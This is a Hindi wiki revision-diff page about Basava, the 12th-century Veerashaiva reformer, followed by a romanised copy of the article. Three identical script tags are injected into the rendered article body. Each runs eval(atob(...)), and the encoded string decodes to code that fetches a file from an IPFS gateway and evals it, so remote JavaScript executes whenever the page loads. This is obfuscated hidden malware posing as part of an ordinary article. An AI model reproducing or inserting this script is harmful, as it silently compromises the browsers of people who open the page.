Difference between revisions of "बसव"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
'''बसव''' (जन्म- 1134; मृत्यु- 1196) 12वीं शताब्दी के धार्मिक सुधारक, उपदेशक, धर्म मीमांसक और चालुक्य राजा बिज्जला प्रथम<ref>शासनकाल, 1156-67</ref> के राजसी कोषागार के प्रबंधक थे। बसव [[हिंदू]] वीरशैव (लिंगायत) मत के पवित्र [[ग्रंथ|ग्रंथों]] में से एक, बसव पुराण के रचयिता हैं।  
+
[[चित्र:Basava.jpg|thumb|बसव]]
 +
'''बसव''' (जन्म- 1134; मृत्यु- 1196) 12वीं शताब्दी के धार्मिक सुधारक, उपदेशक, धर्म मीमांसक और [[चालुक्य]] राजा बिज्जला प्रथम<ref>शासनकाल, 1156-67</ref> के राजसी कोषागार के प्रबंधक थे। बसव [[हिंदू]] वीरशैव (लिंगायत) मत के पवित्र [[ग्रंथ|ग्रंथों]] में से एक, बसव पुराण के रचयिता हैं।  
 
*परंपरा के अनुसार, वह वीरशैव के वास्तविक संस्थापक थे, परंतु [[चालुक्य]] [[अभिलेख|अभिलेखों]] से पता चलता है कि उन्होंने वास्तव में पहले से मौजूद मत को पुनर्जीवित किया।  
 
*परंपरा के अनुसार, वह वीरशैव के वास्तविक संस्थापक थे, परंतु [[चालुक्य]] [[अभिलेख|अभिलेखों]] से पता चलता है कि उन्होंने वास्तव में पहले से मौजूद मत को पुनर्जीवित किया।  
 
*बसव ने वीरशैव संस्थाओं को सहायता देकर और वीरशैव मत की शिक्षा देकर प्रचार में सहायता दी थी।  
 
*बसव ने वीरशैव संस्थाओं को सहायता देकर और वीरशैव मत की शिक्षा देकर प्रचार में सहायता दी थी।  
Line 5: Line 6:
 
*कई [[वर्ष]] तक उनके गुट को काफ़ी लोकप्रियता मिली, परंतु दरबार में अन्य गुट उनकी शक्तियों और उनकी शह में वीरशैल मत के प्रसार से क्षुब्ध थे।  
 
*कई [[वर्ष]] तक उनके गुट को काफ़ी लोकप्रियता मिली, परंतु दरबार में अन्य गुट उनकी शक्तियों और उनकी शह में वीरशैल मत के प्रसार से क्षुब्ध थे।  
 
*उनके द्वारा लगाए गए आरोपों के कारण वह राज्य छोड़ कर चले गए और शीघ्र ही उनकी मृत्यु हो गई।  
 
*उनके द्वारा लगाए गए आरोपों के कारण वह राज्य छोड़ कर चले गए और शीघ्र ही उनकी मृत्यु हो गई।  
*[[शिव|भगवान शिव]] की स्तुति में उनके रचित भजनों से उन्हें कन्नड़ साहित्य में प्रमुख स्थान तथा हिंदू भक्ति साहित्य में भी स्थान मिला।
+
*[[शिव|भगवान शिव]] की स्तुति में उनके रचित भजनों से उन्हें [[कन्नड़ साहित्य]] में प्रमुख स्थान तथा हिंदू भक्ति साहित्य में भी स्थान मिला।
 
 
 
 
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
+
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
{{भारत के संत}}
+
{{भारत के संत}}{{समाज सुधारक}}
{{समाज सुधारक}}
+
[[Category:समाज सुधारक]][[Category:हिन्दू धर्म प्रवर्तक और संत]][[Category:कवि]][[Category:साहित्य कोश]]
[[Category:समाज सुधारक]]
 
[[Category:हिन्दू धर्म प्रवर्तक और संत]]
 
[[Category:कवि]]
 
[[Category:साहित्य कोश]]
 
 
 
 
 
 
__INDEX__
 
__INDEX__

Latest revision as of 09:59, 6 November 2014

thumb|basav basav (janm- 1134; mrityu- 1196) 12vian shatabdi ke dharmik sudharak, upadeshak, dharm mimaansak aur chaluky raja bijjala pratham[1] ke rajasi koshagar ke prabandhak the. basav hiandoo virashaiv (liangayat) mat ke pavitr granthoan mean se ek, basav puran ke rachayita haian.

  • paranpara ke anusar, vah virashaiv ke vastavik sansthapak the, parantu chaluky abhilekhoan se pata chalata hai ki unhoanne vastav mean pahale se maujood mat ko punarjivit kiya.
  • basav ne virashaiv sansthaoan ko sahayata dekar aur virashaiv mat ki shiksha dekar prachar mean sahayata di thi.
  • basav ke chacha pradhanamantri the aur unhoanne basav ko koshagar pramukh ke roop mean niyukt kiya tha.
  • kee varsh tak unake gut ko kafi lokapriyata mili, parantu darabar mean any gut unaki shaktiyoan aur unaki shah mean virashail mat ke prasar se kshubdh the.
  • unake dvara lagae ge aropoan ke karan vah rajy chho d kar chale ge aur shighr hi unaki mrityu ho gee.
  • bhagavan shiv ki stuti mean unake rachit bhajanoan se unhean kann d sahity mean pramukh sthan tatha hiandoo bhakti sahity mean bhi sthan mila.

 

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. shasanakal, 1156-67

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>